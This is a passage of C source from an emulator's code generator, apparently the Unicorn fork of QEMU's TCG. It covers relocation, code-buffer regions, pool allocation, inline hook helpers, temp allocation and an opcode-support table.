TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch32(tcg_insn_unit *p, uint32_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 4) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 8 static QEMU_UNUSED_FUNC inline void tcg_out64(TCGContext *s, uint64_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 8) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (8 / TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch64(tcg_insn_unit *p, uint64_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 8) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif /* label relocation processing */ static void tcg_out_reloc(TCGContext *s, tcg_insn_unit *code_ptr, int type, TCGLabel *l, intptr_t addend) { TCGRelocation *r = tcg_malloc(s, sizeof(TCGRelocation)); r->type = type; r->ptr = code_ptr; r->addend = addend; QSIMPLEQ_INSERT_TAIL(&l->relocs, r, next); } static void tcg_out_label(TCGContext *s, TCGLabel *l, tcg_insn_unit *ptr) { tcg_debug_assert(!l->has_value); l->has_value = 1; l->u.value_ptr = ptr; } TCGLabel *gen_new_label(TCGContext *s) { TCGLabel *l = tcg_malloc(s, sizeof(TCGLabel)); memset(l, 0, sizeof(TCGLabel)); l->id = s->nb_labels++; QSIMPLEQ_INIT(&l->relocs); QSIMPLEQ_INSERT_TAIL(&s->labels, l, next); return l; } static bool tcg_resolve_relocs(TCGContext *s) { TCGLabel *l; QSIMPLEQ_FOREACH(l, &s->labels, next) { TCGRelocation *r; uintptr_t value = l->u.value; QSIMPLEQ_FOREACH(r, &l->relocs, next) { if (!patch_reloc(r->ptr, r->type, value, r->addend)) { return false; } } } return true; } static void set_jmp_reset_offset(TCGContext *s, int which) { size_t off = tcg_current_code_size(s); s->tb_jmp_reset_offset[which] = off; /* Make sure that we didn't overflow the stored offset. */ assert(s->tb_jmp_reset_offset[which] == off); } #include "tcg-target.inc.c" /* compare a pointer @ptr and a tb_tc @s */ static int ptr_cmp_tb_tc(const void *ptr, const struct tb_tc *s) { if ((char *)ptr >= (char *)s->ptr + s->size) { return 1; } else if (ptr < s->ptr) { return -1; } return 0; } static gint tb_tc_cmp(gconstpointer ap, gconstpointer bp) { const struct tb_tc *a = ap; const struct tb_tc *b = bp; /* * When both sizes are set, we know this isn't a lookup. * This is the most likely case: every TB must be inserted; lookups * are a lot less frequent. */ if (likely(a->size && b->size)) { if (a->ptr > b->ptr) { return 1; } else if (a->ptr < b->ptr) { return -1; } /* a->ptr == b->ptr should happen only on deletions */ g_assert(a->size == b->size); return 0; } /* * All lookups have either .size field set to 0. * From the glib sources we see that @ap is always the lookup key. However * the docs provide no guarantee, so we just mark this case as likely. */ if (likely(a->size == 0)) { return ptr_cmp_tb_tc(a->ptr, b); } return ptr_cmp_tb_tc(b->ptr, a); } void tcg_tb_insert(TCGContext *tcg_ctx, TranslationBlock *tb) { g_tree_insert(tcg_ctx->tree, &tb->tc, tb); } void tcg_tb_remove(TCGContext *tcg_ctx, TranslationBlock *tb) { g_tree_remove(tcg_ctx->tree, &tb->tc); } /* * Find the TB 'tb' such that * tb->tc.ptr <= tc_ptr < tb->tc.ptr + tb->tc.size * Return NULL if not found. */ TranslationBlock *tcg_tb_lookup(TCGContext *tcg_ctx, uintptr_t tc_ptr) { TranslationBlock *tb; struct tb_tc s = { .ptr = (void *)tc_ptr }; tb = g_tree_lookup(tcg_ctx->tree, &s); return tb; } void tcg_tb_foreach(TCGContext *tcg_ctx, GTraverseFunc func, gpointer user_data) { g_tree_foreach(tcg_ctx->tree, func, user_data); } size_t tcg_nb_tbs(TCGContext *tcg_ctx) { size_t nb_tbs = 0; nb_tbs = g_tree_nnodes(tcg_ctx->tree); return nb_tbs; } static void tcg_region_tree_reset_all(TCGContext *tcg_ctx) { g_tree_ref(tcg_ctx->tree); g_tree_destroy(tcg_ctx->tree); } static void tcg_region_bounds(TCGContext *tcg_ctx, size_t curr_region, void **pstart, void **pend) { char *start, *end; start = (char *)tcg_ctx->region.start_aligned + curr_region * tcg_ctx->region.stride; end = start + tcg_ctx->region.size; if (curr_region == 0) { start = tcg_ctx->region.start; } if (curr_region == tcg_ctx->region.n - 1) { end = tcg_ctx->region.end; } *pstart = start; *pend = end; } static void tcg_region_assign(TCGContext *s, size_t curr_region) { void *start, *end; tcg_region_bounds(s, curr_region, &start, &end); s->code_gen_buffer = start; s->code_gen_ptr = start; s->code_gen_buffer_size = (char *)end - (char *)start; memset(s->code_gen_buffer, 0x00, s->code_gen_buffer_size); s->code_gen_highwater = (char *)end - TCG_HIGHWATER; } static bool tcg_region_alloc__locked(TCGContext *s) { if (s->region.current == s->region.n) { return true; } tcg_region_assign(s, s->region.current); s->region.current++; return false; } /* * Request a new region once the one in use has filled up. * Returns true on error. */ static bool tcg_region_alloc(TCGContext *s) { bool err; /* read the region size now; alloc__locked will overwrite it on success */ size_t size_full = s->code_gen_buffer_size; err = tcg_region_alloc__locked(s); if (!err) { s->region.agg_size_full += size_full - TCG_HIGHWATER; } return err; } /* * Perform a context's first region allocation. * This function does _not_ increment region.agg_size_full. */ static inline bool tcg_region_initial_alloc__locked(TCGContext *s) { return tcg_region_alloc__locked(s); } /* Call from a safe-work context */ void tcg_region_reset_all(TCGContext *tcg_ctx) { tcg_ctx->region.current = 0; tcg_ctx->region.agg_size_full = 0; #ifndef NDEBUG bool err = tcg_region_initial_alloc__locked(tcg_ctx); g_assert(!err); #else tcg_region_initial_alloc__locked(tcg_ctx); #endif tcg_region_tree_reset_all(tcg_ctx); } /* * Initializes region partitioning. * * Called at init time from the parent thread (i.e. the one calling * tcg_context_init), after the target's TCG globals have been set. * * Region partitioning works by splitting code_gen_buffer into separate regions, * and then assigning regions to TCG threads so that the threads can translate * code in parallel without synchronization. * * In softmmu the number of TCG threads is bounded by max_cpus, so we use at * least max_cpus regions in MTTCG. In !MTTCG we use a single region. * Note that the TCG options from the command-line (i.e. -accel accel=tcg,[...]) * must have been parsed before calling this function, since it calls * qemu_tcg_mttcg_enabled(). * * In user-mode we use a single region. Having multiple regions in user-mode * is not supported, because the number of vCPU threads (recall that each thread * spawned by the guest corresponds to a vCPU thread) is only bounded by the * OS, and usually this number is huge (tens of thousands is not uncommon). * Thus, given this large bound on the number of vCPU threads and the fact * that code_gen_buffer is allocated at compile-time, we cannot guarantee * that the availability of at least one region per vCPU thread. * * However, this user-mode limitation is unlikely to be a significant problem * in practice. Multi-threaded guests share most if not all of their translated * code, which makes parallel code generation less appealing than in softmmu. */ void tcg_region_init(TCGContext *tcg_ctx) { void *buf = tcg_ctx->code_gen_buffer; void *aligned; size_t size = tcg_ctx->code_gen_buffer_size; size_t page_size = tcg_ctx->uc->qemu_real_host_page_size; size_t region_size; size_t n_regions; size_t i; n_regions = 1; /* The first region will be 'aligned - buf' bytes larger than the others */ aligned = (void *)QEMU_ALIGN_PTR_UP(buf, page_size); g_assert((char *)aligned < ((char *)tcg_ctx->code_gen_buffer + size)); /* * Make region_size a multiple of page_size, using aligned as the start. * As a result of this we might end up with a few extra pages at the end of * the buffer; we will assign those to the last region. */ region_size = (size - ((char *)aligned - (char *)buf)) / n_regions; region_size = QEMU_ALIGN_DOWN(region_size, page_size); /* A region must have at least 2 pages; one code, one guard */ g_assert(region_size >= 2 * page_size); /* init the region struct */ tcg_ctx->region.n = n_regions; tcg_ctx->region.size = region_size - page_size; tcg_ctx->region.stride = region_size; tcg_ctx->region.start = buf; tcg_ctx->region.start_aligned = aligned; /* page-align the end, since its last page will be a guard page */ tcg_ctx->region.end = (void *)QEMU_ALIGN_PTR_DOWN((char *)buf + size, page_size); /* account for that last guard page */ tcg_ctx->region.end = (void *)((char *)tcg_ctx->region.end - page_size); /* set guard pages */ for (i = 0; i < tcg_ctx->region.n; i++) { void *start, *end; tcg_region_bounds(tcg_ctx, i, &start, &end); (void)qemu_mprotect_none(end, page_size); } tcg_ctx->tree = g_tree_new(tb_tc_cmp); } /* * Returns the size (in bytes) of all translated code (i.e. from all regions) * currently in the cache. * See also: tcg_code_capacity() * Do not confuse with tcg_current_code_size(); that one applies to a single * TCG context. */ size_t tcg_code_size(TCGContext *tcg_ctx) { size_t total; size_t size; total = tcg_ctx->region.agg_size_full; size = (char *)tcg_ctx->code_gen_ptr - (char *)tcg_ctx->code_gen_buffer; g_assert(size <= tcg_ctx->code_gen_buffer_size); total += size; return total; } /* * Returns the code capacity (in bytes) of the entire cache, i.e. including all * regions. * See also: tcg_code_size() */ size_t tcg_code_capacity(TCGContext *tcg_ctx) { size_t guard_size, capacity; /* no need for synchronization; these variables are set at init time */ guard_size = tcg_ctx->region.stride - tcg_ctx->region.size; capacity = (char *)tcg_ctx->region.end + guard_size - (char *)tcg_ctx->region.start; capacity -= tcg_ctx->region.n * (guard_size + TCG_HIGHWATER); return capacity; } size_t tcg_tb_phys_invalidate_count(TCGContext *tcg_ctx) { size_t total = 0; total = tcg_ctx->tb_phys_invalidate_count; return total; } /* pool based memory allocation */ void *tcg_malloc_internal(TCGContext *s, int size) { TCGPool *p; int pool_size; if (size > TCG_POOL_CHUNK_SIZE) { /* big malloc: insert a new pool (XXX: could optimize) */ p = g_malloc(sizeof(TCGPool) + size); p->size = size; p->next = s->pool_first_large; s->pool_first_large = p; return p->data; } else { p = s->pool_current; if (!p) { p = s->pool_first; if (!p) goto new_pool; } else { if (!p->next) { new_pool: pool_size = TCG_POOL_CHUNK_SIZE; p = g_malloc(sizeof(TCGPool) + pool_size); p->size = pool_size; p->next = NULL; if (s->pool_current) s->pool_current->next = p; else s->pool_first = p; } else { p = p->next; } } } s->pool_current = p; s->pool_cur = p->data + size; s->pool_end = p->data + p->size; return p->data; } void tcg_pool_reset(TCGContext *s) { TCGPool *p, *t; for (p = s->pool_first_large; p; p = t) { t = p->next; g_free(p); } s->pool_first_large = NULL; s->pool_cur = s->pool_end = NULL; s->pool_current = NULL; } typedef struct TCGHelperInfo { void *func; const char *name; unsigned flags; unsigned sizemask; } TCGHelperInfo; #include "exec/helper-proto.h" static const TCGHelperInfo all_helpers[] = { #include "exec/helper-tcg.h" }; static const TCGOpDef tcg_op_defs_org[] = { #define DEF(s, oargs, iargs, cargs, flags) \ { #s, oargs, iargs, cargs, iargs + oargs + cargs, flags }, #include "tcg/tcg-opc.h" #undef DEF }; static void process_op_defs(TCGContext *s); static TCGTemp *tcg_global_reg_new_internal(TCGContext *s, TCGType type, TCGReg reg, const char *name); void uc_add_inline_hook(uc_engine *uc, struct hook *hk, void** args, int args_len) { TCGHelperInfo* info = g_malloc(sizeof(TCGHelperInfo)); char *name = g_malloc(64); unsigned sizemask = 0xFFFFFFFF; TCGContext *tcg_ctx = uc->tcg_ctx; GHashTable *helper_table = uc->tcg_ctx->helper_table; info->func = hk->callback; info->name = name; info->flags = 0; // From helper-head.h // Only UC_HOOK_BLOCK and UC_HOOK_CODE is generated into tcg code and can be inlined. switch (hk->type) { case UC_HOOK_BLOCK: case UC_HOOK_CODE: // (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); sizemask = dh_sizemask(void, 0) | dh_sizemask(ptr, 1) | dh_sizemask(i64, 2) | dh_sizemask(i32, 3) | dh_sizemask(ptr, 4); snprintf(name, 63, "hookcode_%d_%" PRIx64 , hk->type, (uint64_t)hk->callback); break; default: break; } name[63] = 0; info->name = name; info->sizemask = sizemask; g_hash_table_insert(helper_table, (gpointer)info->func, (gpointer)info); g_hash_table_insert(uc->tcg_ctx->custom_helper_infos, (gpointer)info->func, (gpointer)info); tcg_gen_callN(tcg_ctx, info->func, NULL, args_len, (TCGTemp**)args); } static void uc_free_inline_hook_info(void *p) { TCGHelperInfo *info = (TCGHelperInfo *)p; g_free((void*)(info->name)); g_free(info); } void uc_del_inline_hook(uc_engine *uc, struct hook *hk) { g_hash_table_remove(uc->tcg_ctx->custom_helper_infos, hk->callback); } void tcg_context_init(TCGContext *s) { int op, total_args, n, i; TCGOpDef *def; TCGArgConstraint *args_ct; int *sorted_args; TCGTemp *ts; GHashTable *helper_table; memset(s, 0, sizeof(*s)); s->nb_globals = 0; // copy original tcg_op_defs_org for private usage s->tcg_op_defs = g_malloc0(sizeof(tcg_op_defs_org)); memcpy(s->tcg_op_defs, tcg_op_defs_org, sizeof(tcg_op_defs_org)); /* Count total number of arguments and allocate the corresponding space */ total_args = 0; for(op = 0; op < NB_OPS; op++) { def = &s->tcg_op_defs[op]; n = def->nb_iargs + def->nb_oargs; total_args += n; } args_ct = g_malloc0(sizeof(TCGArgConstraint) * total_args); sorted_args = g_malloc0(sizeof(int) * total_args); for(op = 0; op < NB_OPS; op++) { def = &s->tcg_op_defs[op]; def->args_ct = args_ct; def->sorted_args = sorted_args; n = def->nb_iargs + def->nb_oargs; sorted_args += n; args_ct += n; } /* Register helpers. */ /* Use g_direct_hash/equal for direct pointer comparisons on func. */ helper_table = g_hash_table_new(NULL, NULL); s->helper_table = helper_table; // Unicorn: Store our custom inline hooks infomation s->custom_helper_infos = g_hash_table_new_full(NULL, NULL, NULL, uc_free_inline_hook_info); for (i = 0; i < ARRAY_SIZE(all_helpers); ++i) { g_hash_table_insert(helper_table, (gpointer)all_helpers[i].func, (gpointer)&all_helpers[i]); } tcg_target_init(s); process_op_defs(s); /* Reverse the order of the saved registers, assuming they're all at the start of tcg_target_reg_alloc_order. */ for (n = 0; n < ARRAY_SIZE(tcg_target_reg_alloc_order); ++n) { int r = tcg_target_reg_alloc_order[n]; if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, r)) { break; } } n = ARRAY_SIZE(tcg_target_reg_alloc_order); s->indirect_reg_alloc_order = g_malloc(sizeof(int) * n); for (i = 0; i < n; ++i) { s->indirect_reg_alloc_order[i] = tcg_target_reg_alloc_order[n - 1 - i]; } for (; i < ARRAY_SIZE(tcg_target_reg_alloc_order); ++i) { s->indirect_reg_alloc_order[i] = tcg_target_reg_alloc_order[i]; } s->one_entry = g_malloc(sizeof(struct jit_code_entry)); s->one_entry->symfile_addr = NULL; tcg_debug_assert(!tcg_regset_test_reg(s->reserved_regs, TCG_AREG0)); ts = tcg_global_reg_new_internal(s, TCG_TYPE_PTR, TCG_AREG0, "env"); s->cpu_env = temp_tcgv_ptr(s, ts); } /* * Allocate TBs right before their corresponding translated code, making * sure that TBs and code are on different cache lines. */ TranslationBlock *tcg_tb_alloc(TCGContext *s) { uintptr_t align = s->uc->qemu_icache_linesize; TranslationBlock *tb; void *next; retry: tb = (void *)ROUND_UP((uintptr_t)s->code_gen_ptr, align); next = (void *)ROUND_UP((uintptr_t)(tb + 1), align); if (unlikely(next > s->code_gen_highwater)) { if (tcg_region_alloc(s)) { return NULL; } goto retry; } s->code_gen_ptr = next; s->data_gen_ptr = NULL; return tb; } void tcg_prologue_init(TCGContext *s) { size_t prologue_size, total_size; void *buf0, *buf1; /* Put the prologue at the beginning of code_gen_buffer. */ buf0 = s->code_gen_buffer; total_size = s->code_gen_buffer_size; s->code_ptr = buf0; s->code_buf = buf0; s->data_gen_ptr = NULL; s->code_gen_prologue = buf0; /* Compute a high-water mark, at which we voluntarily flush the buffer and start over. The size here is arbitrary, significantly larger than we expect the code generation for any one opcode to require. */ s->code_gen_highwater = (char *)s->code_gen_buffer + (total_size - TCG_HIGHWATER) - s->uc->qemu_real_host_page_size; #ifdef TCG_TARGET_NEED_POOL_LABELS s->pool_labels = NULL; #endif /* Generate the prologue. */ tcg_target_qemu_prologue(s); #ifdef TCG_TARGET_NEED_POOL_LABELS /* Allow the prologue to put e.g. guest_base into a pool entry. */ { int result = tcg_out_pool_finalize(s); tcg_debug_assert(result == 0); } #endif buf1 = s->code_ptr; flush_icache_range((uintptr_t)buf0, (uintptr_t)buf1); /* Deduct the prologue from the buffer. */ prologue_size = tcg_current_code_size(s); s->code_gen_ptr = buf1; s->code_gen_buffer = buf1; s->code_buf = buf1; total_size -= prologue_size; s->code_gen_buffer_size = total_size; tcg_register_jit(s, s->code_gen_buffer, total_size); /* Assert that goto_ptr is implemented completely. */ if (TCG_TARGET_HAS_goto_ptr) { tcg_debug_assert(s->code_gen_epilogue != NULL); } } void tcg_func_start(TCGContext *s) { tcg_pool_reset(s); s->nb_temps = s->nb_globals; /* No temps have been previously allocated for size or locality. */ memset(s->free_temps, 0, sizeof(s->free_temps)); s->nb_ops = 0; s->nb_labels = 0; s->current_frame_offset = s->frame_start; #ifdef CONFIG_DEBUG_TCG s->goto_tb_issue_mask = 0; #endif QTAILQ_INIT(&s->ops); QTAILQ_INIT(&s->free_ops); QSIMPLEQ_INIT(&s->labels); } static inline TCGTemp *tcg_temp_alloc(TCGContext *s) { int n = s->nb_temps++; tcg_debug_assert(n < TCG_MAX_TEMPS); return memset(&s->temps[n], 0, sizeof(TCGTemp)); } static inline TCGTemp *tcg_global_alloc(TCGContext *s) { TCGTemp *ts; tcg_debug_assert(s->nb_globals == s->nb_temps); s->nb_globals++; ts = tcg_temp_alloc(s); ts->temp_global = 1; return ts; } static TCGTemp *tcg_global_reg_new_internal(TCGContext *s, TCGType type, TCGReg reg, const char *name) { TCGTemp *ts; if (TCG_TARGET_REG_BITS == 32 && type != TCG_TYPE_I32) { tcg_abort(); } ts = tcg_global_alloc(s); ts->base_type = type; ts->type = type; ts->fixed_reg = 1; ts->reg = reg; ts->name = name; tcg_regset_set_reg(s->reserved_regs, reg); return ts; } void tcg_set_frame(TCGContext *s, TCGReg reg, intptr_t start, intptr_t size) { s->frame_start = start; s->frame_end = start + size; s->frame_temp = tcg_global_reg_new_internal(s, TCG_TYPE_PTR, reg, "_frame"); } TCGTemp *tcg_global_mem_new_internal(TCGContext *s, TCGType type, TCGv_ptr base, intptr_t offset, const char *name) { TCGTemp *base_ts = tcgv_ptr_temp(s, base); TCGTemp *ts = tcg_global_alloc(s); int indirect_reg = 0, bigendian = 0; #ifdef HOST_WORDS_BIGENDIAN bigendian = 1; #endif if (!base_ts->fixed_reg) { /* We do not support double-indirect registers. */ tcg_debug_assert(!base_ts->indirect_reg); base_ts->indirect_base = 1; s->nb_indirects += (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64 ? 2 : 1); indirect_reg = 1; } if (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64) { TCGTemp *ts2 = tcg_global_alloc(s); char buf[64]; ts->base_type = TCG_TYPE_I64; ts->type = TCG_TYPE_I32; ts->indirect_reg = indirect_reg; ts->mem_allocated = 1; ts->mem_base = base_ts; ts->mem_offset = offset + bigendian * 4; pstrcpy(buf, sizeof(buf), name); pstrcat(buf, sizeof(buf), "_0"); ts->name = g_strdup(buf); tcg_debug_assert(ts2 == ts + 1); ts2->base_type = TCG_TYPE_I64; ts2->type = TCG_TYPE_I32; ts2->indirect_reg = indirect_reg; ts2->mem_allocated = 1; ts2->mem_base = base_ts; ts2->mem_offset = offset + (1 - bigendian) * 4; pstrcpy(buf, sizeof(buf), name); pstrcat(buf, sizeof(buf), "_1"); ts2->name = g_strdup(buf); } else { ts->base_type = type; ts->type = type; ts->indirect_reg = indirect_reg; ts->mem_allocated = 1; ts->mem_base = base_ts; ts->mem_offset = offset; ts->name = name; } return ts; } TCGTemp *tcg_temp_new_internal(TCGContext *s, TCGType type, bool temp_local) { TCGTemp *ts; int idx, k; k = type + (temp_local ? TCG_TYPE_COUNT : 0); idx = find_first_bit(s->free_temps[k].l, TCG_MAX_TEMPS); if (idx < TCG_MAX_TEMPS) { /* There is already an available temp with the right type. */ clear_bit(idx, s->free_temps[k].l); ts = &s->temps[idx]; ts->temp_allocated = 1; tcg_debug_assert(ts->base_type == type); tcg_debug_assert(ts->temp_local == temp_local); } else { ts = tcg_temp_alloc(s); if (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64) { TCGTemp *ts2 = tcg_temp_alloc(s); ts->base_type = type; ts->type = TCG_TYPE_I32; ts->temp_allocated = 1; ts->temp_local = temp_local; tcg_debug_assert(ts2 == ts + 1); ts2->base_type = TCG_TYPE_I64; ts2->type = TCG_TYPE_I32; ts2->temp_allocated = 1; ts2->temp_local = temp_local; } else { ts->base_type = type; ts->type = type; ts->temp_allocated = 1; ts->temp_local = temp_local; } } #if defined(CONFIG_DEBUG_TCG) s->temps_in_use++; #endif return ts; } TCGv_vec tcg_temp_new_vec(TCGContext *tcg_ctx, TCGType type) { TCGTemp *t; #ifdef CONFIG_DEBUG_TCG switch (type) { case TCG_TYPE_V64: assert(TCG_TARGET_HAS_v64); break; case TCG_TYPE_V128: assert(TCG_TARGET_HAS_v128); break; case TCG_TYPE_V256: assert(TCG_TARGET_HAS_v256); break; default: g_assert_not_reached(); } #endif t = tcg_temp_new_internal(tcg_ctx, type, 0); return temp_tcgv_vec(tcg_ctx, t); } /* Create a new temp of the same type as an existing temp. */ TCGv_vec tcg_temp_new_vec_matching(TCGContext *tcg_ctx, TCGv_vec match) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, match); tcg_debug_assert(t->temp_allocated != 0); t = tcg_temp_new_internal(tcg_ctx, t->base_type, 0); return temp_tcgv_vec(tcg_ctx, t); } void tcg_temp_free_internal(TCGContext *s, TCGTemp *ts) { int k, idx; #if defined(CONFIG_DEBUG_TCG) s->temps_in_use--; if (s->temps_in_use < 0) { fprintf(stderr, "More temporaries freed than allocated!\n"); } #endif tcg_debug_assert(ts->temp_global == 0); tcg_debug_assert(ts->temp_allocated != 0); ts->temp_allocated = 0; idx = temp_idx(s, ts); k = ts->base_type + (ts->temp_local ? TCG_TYPE_COUNT : 0); set_bit(idx, s->free_temps[k].l); } TCGv_i32 tcg_const_i32(TCGContext *tcg_ctx, int32_t val) { TCGv_i32 t0; t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, val); return t0; } TCGv_i64 tcg_const_i64(TCGContext *tcg_ctx, int64_t val) { TCGv_i64 t0; t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, val); return t0; } TCGv_i32 tcg_const_local_i32(TCGContext *tcg_ctx, int32_t val) { TCGv_i32 t0; t0 = tcg_temp_local_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, val); return t0; } TCGv_i64 tcg_const_local_i64(TCGContext *tcg_ctx, int64_t val) { TCGv_i64 t0; t0 = tcg_temp_local_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, val); return t0; } #if defined(CONFIG_DEBUG_TCG) void tcg_clear_temp_count(TCGContext *s) { s->temps_in_use = 0; } int tcg_check_temp_count(TCGContext *s) { if (s->temps_in_use) { /* Clear the count so that we don't give another * warning immediately next time around. */ s->temps_in_use = 0; return 1; } return 0; } #endif /* Return true if OP may appear in the opcode stream. Test the runtime variable that controls each opcode. */ bool tcg_op_supported(TCGOpcode op) { const bool have_vec = TCG_TARGET_HAS_v64 | TCG_TARGET_HAS_v128 | TCG_TARGET_HAS_v256; switch (op) { case INDEX_op_discard: case INDEX_op_set_label: case INDEX_op_call: case INDEX_op_br: case INDEX_op_mb: case INDEX_op_insn_start: case INDEX_op_exit_tb: case INDEX_op_goto_tb: case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_st_i32: case INDEX_op_qemu_ld_i64: case INDEX_op_qemu_st_i64: return true; case INDEX_op_goto_ptr: return TCG_TARGET_HAS_goto_ptr; case INDEX_op_mov_i32: case INDEX_op_movi_i32: case INDEX_op_setcond_i32: case INDEX_op_brcond_i32: case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_add_i32: case INDEX_op_sub_i32: case INDEX_op_mul_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: return true; case INDEX_op_movcond_i32: return TCG_TARGET_HAS_movcond_i32; case INDEX_op_div_i32: case INDEX_op_divu_i32: return TCG_TARGET_HAS_div_i32; case INDEX_op_rem_i32: case INDEX_op_remu_i32: return TCG_TARGET_HAS_rem_i32; case INDEX_op_div2_i32: case INDEX_op_divu2_i32: return TCG_TARGET_HAS_div2_i32; case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: return TCG_TARGET_HAS_rot_i32; case INDEX_op_deposit_i32: return TCG_TARGET_HAS_deposit_i32; case INDEX_op_extract_i32: return TCG_TARGET_HAS_extract_i32; case INDEX_op_sextract_i32: return TCG_TARGET_HAS_sextract_i32; case INDEX_op_extract2_i32: return TCG_TARGET_HAS_extract2_i32; case INDEX_op_add2_i32: return TCG_TARGET_HAS_add2_i32; case INDEX_op_sub2_i32: return TCG_TARGET_HAS_sub2_i32; case INDEX_op_mulu2_i32: return TCG_TARGET_HAS_mulu2_i32; case INDEX_op_muls2_i32: return TCG_TARGET_HAS_muls2_i32; case INDEX_op_muluh_i32: return TCG_TARGET_HAS_muluh_i32; case INDEX_op_mulsh_i32: return TCG_TARGET_HAS_mulsh_i32; case INDEX_op_ext8s_i32: return TCG_TARGET_HAS_ext8s_i32; case INDEX_op_ext16s_i32: return TCG_TARGET_HAS_ext16s_i32; case INDEX_op_ext8u_i32: return TCG_TARGET_HAS_ext8u_i32; case INDEX_op_ext16u_i32: return TCG_TARGET_HAS_ext16u_i32; case INDEX_op_bswap16_i32: return TCG_TARGET_HAS_bswap16_i32; case INDEX_op_bswap32_i32: return TCG_TARGET_HAS_bswap32_i32; case INDEX_op_not_i32: return TCG_TARGET_HAS_not_i32; case INDEX_op_neg_i32: return TCG_TARGET_HAS_neg_i32; case INDEX_op_andc_i32: return TCG_TARGET_HAS_andc_i32; case INDEX_op_orc_i32: return TCG_TARGET_HAS_orc_i32; case INDEX_op_eqv_i32: return TCG_TARGET_HAS_eqv_i32; case INDEX_op_nand_i32: return TCG_TARGET_HAS_nand_i32; case INDEX_op_nor_i32: return TCG_TARGET_HAS_nor_i32; case INDEX_op_clz_i32: return TCG_TARGET_HAS_clz_i32; case INDEX_op_ctz_i32: return TCG_TARGET_HAS_ctz_i32; case INDEX_op_ctpop_i32: return TCG_TARGET_HAS_ctpop_i32; case INDEX_op_brcond2_i32: case INDEX_op_setcond2_i32: return TCG_TARGET_REG_BITS == 32; case INDEX_op_mov_i64: case INDEX_op_movi_i64: case INDEX_op_setcond_i64: case INDEX_op_brcond_i64: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: case INDEX_op_add_i64: case INDEX_op_sub_i64: case INDEX_op_mul_i64: case INDEX_op_and_i64: case INDEX_op_or_i64: case INDEX_op_xor_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: return TCG_TARGET_REG_BITS == 64; case INDEX_op_movcond_i64: return TCG_TARGET_HAS_movcond_i64; case INDEX_op_div_i64: case INDEX_op_divu_i64: return TCG_TARGET_HAS_div_i64; case INDEX_op_rem_i64: case INDEX_op_remu_i64: return TCG_TARGET_HAS_rem_i64; case INDEX_op_div2_i64: case INDEX_op_divu2_i64: return TCG_TARGET_HAS_div2_i64; case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: return TCG_TARGET_HAS_rot_i64; case INDEX_op_deposit_i64: return TCG_TARGET_HAS_deposit_i64; case INDEX_op_extract_i64: return TCG_TARGET_HAS_extract_i64; case INDEX_op_sextract_i64: return TCG_TARGET_HAS_sextract_i64; case INDEX_op_extract2_i64: return TCG_TARGET_HAS_extract2_i64; case INDEX_op_extrl_i64_i32: return TCG_TARGET_HAS_extrl_i64_i32; case INDEX_op_extrh_i64_i32: return TCG_TARGET_HAS_extrh_i64_i32; case INDEX_op_ext8s_i64: return TCG_TARGET_HAS_ext8s_i64; case INDEX_op_ext16s_i64: return TCG_TARGET_HAS_ext16s_i64; case INDEX_op_ext32s_i64: return TCG_TARGET_HAS_ext32s_i64; case INDEX_op_ext8u_i64: return TCG_TARGET_HAS_ext8u_i64; case INDEX_op_ext16u_i64: return TCG_TARGET_HAS_ext16u_i64; case INDEX_op_ext32u_i64: return TCG_TARGET_HAS_ext32u_i64; case INDEX_op_bswap16_i64: return TCG_TARGET_HAS_bswap16_i64; case INDEX_op_bswap32_i64: return TCG_TARGET_HAS_bswap32_i64; case INDEX_op_bswap64_i64: return TCG_TARGET_HAS_bswap64_i64; case INDEX_op_not_i64: return TCG_TARGET_HAS_not_i64; case INDEX_op_neg_i64: return TCG_TARGET_HAS_neg_i64; case INDEX_op_andc_i64: return TCG_TARGET_HAS_andc_i64; case INDEX_op_orc_i64: return TCG_TARGET_HAS_orc_i64; case INDEX_op_eqv_i64: return TCG_TARGET_HAS_eqv_i64; case INDEX_op_nand_i64: return TCG_TARGET_HAS_nand_i64; case INDEX_op_nor_i64: return TCG_TARGET_HAS_nor_i64; case INDEX_op_clz_i64: return TCG_TARGET_HAS_clz_i64; case INDEX_op_ctz_i64: return TCG_TARGET_HAS_ctz_i64; case INDEX_op_ctpop_i64: return TCG_TARGET_HAS_ctpop_i64; case INDEX_op_add2_i64: return TCG_TARGET_HAS_add2_i64; case INDEX_op_sub2_i64: return 